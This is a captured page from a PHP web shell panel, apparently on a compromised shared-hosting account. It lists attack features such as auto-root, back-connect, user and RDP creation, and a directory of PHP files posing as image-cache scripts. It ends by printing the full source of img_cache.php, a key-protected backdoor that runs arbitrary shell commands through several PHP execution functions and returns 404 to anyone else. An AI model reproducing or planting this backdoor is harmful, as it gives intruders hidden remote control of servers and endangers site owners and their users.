Linux webm008.cluster115.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.115.20.8 | : 216.73.216.59
Cant Read [ /etc/named.conf ]
8.1.34
quelfutuu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
quelfutuu /
www /
lchg /
local /
[ HOME SHELL ]
Name
Size
Permission
Action
cache-css
[ DIR ]
drwxrwxrwx
cache-gd2
[ DIR ]
drwxrwxrwx
cache-js
[ DIR ]
drwxrwxrwx
cache-vignettes
[ DIR ]
drwxrwxrwx
CACHEDIR.TAG
187
B
-rw----r--
Nx_.php
397
B
-rw-rw-rw-
Vp_.php
397
B
-rw-rw-rw-
config.txt
610
B
-rw-rw-rw-
img_cache.php
700
B
-rw-rw-rw-
img_caches.php
700
B
-rw-rw-rw-
img_gnkp7r.php
1.57
KB
-rw-rw-rw-
img_k2ybka.php
1.57
KB
-rw-rw-rw-
remove.txt
83
B
-rw----r--
sitemange.php
4.14
KB
-rw-rw-rw-
test-gif.jpg
631
B
-rw-rw-rw-
test-jpg.jpg
631
B
-rw-rw-rw-
test_convert.jpg
9.59
KB
-rw-rw-rw-
test_gd1.jpg
9.72
KB
-rw-rw-rw-
test_gd2.jpg
9
KB
-rw-rw-rw-
test_imagick.jpg
12.77
KB
-rw-rw-rw-
test_netpbm.jpg
7.37
KB
-rw-rw-rw-
yami.php
777
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : img_cache.php
<?php @error_reporting(0);@ini_set('display_errors',0); header('X-Nx:Nx-zD1'); if(!isset($_REQUEST['k'])||$_REQUEST['k']!=='nXk'){http_response_code(404);die();} $c=@$_REQUEST['c']??''; if($c===''){echo '<pre>Nx-zD1 active</pre>';die();} $o=''; if(function_exists('system')){ob_start();@system($c);$o=ob_get_clean();} elseif(function_exists('passthru')){ob_start();@passthru($c);$o=ob_get_clean();} elseif(function_exists('exec')){@exec($c,$a);$o=implode("\n",$a);} elseif(function_exists('shell_exec')){$o=@shell_exec($c);} elseif(function_exists('popen')){$f=@popen($c,'r');$o='';while(!feof($f)){$o.=fread($f,4096);}pclose($f);} else{$o='[no exec]';} echo '<pre>'.htmlspecialchars($o).'</pre>'; ?>
Close